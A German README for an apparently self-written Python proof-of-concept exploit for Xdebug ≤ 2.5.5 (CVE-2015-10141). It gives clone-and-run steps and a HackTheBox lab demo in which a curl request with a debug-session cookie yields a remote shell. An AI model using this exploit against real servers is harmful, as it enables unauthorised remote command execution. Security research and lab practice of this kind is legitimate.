
Proof-of-Concept-Exploit-Skript für Xdebug 2.5.5 und frühere Versionen (CVE-2015-10141).
Eigener Python-Exploit für Xdebug ≤ 2.5.5 (CVE-2015-10141).
Dieses Repository enthält meinen Proof-of-Concept (PoC) Exploit für die Xdebug-Schwachstelle zur Remote-Codeausführung in den Versionen 2.5.5 und früher.
Das Skript nutzt das nicht authentifizierte Debugging-Protokoll, das auf Port 9000 offengelegt ist, um eine Remote-Befehlsausführung zu erreichen.
git clone https://github.com/n0m4d22/PoC-CVE-2015-10141.git
cd PoC-CVE-2015-10141
python3 exploit.py
Wenn du dazu aufgefordert wirst, gib die Ziel-IP ein, auf der Xdebug gehostet wird.
Demonstration aus meinem kürzlichen HackTheBox Olympus (Medium) Write-up :
┌──(kali㉿kali)-[~]
└─$ python exploit.py
[*] Target IP: 10.129.124.136
[*] Connecting to 0.0.0.0:9000 ...
[*] Initializing debugging: curl http://10.129.124.136 -H "Cookie: XDEBUG_SESSION=olympus"
[*] Connection to ('10.129.124.136', 36354) established.
$ whoami
www-data
Dieses Projekt dient ausschließlich zu Bildungszwecken.
Verwende diesen Exploit nicht gegen Systeme ohne ausdrückliche Genehmigung. Ich übernehme keine Verantwortung für Missbrauch dieses Codes.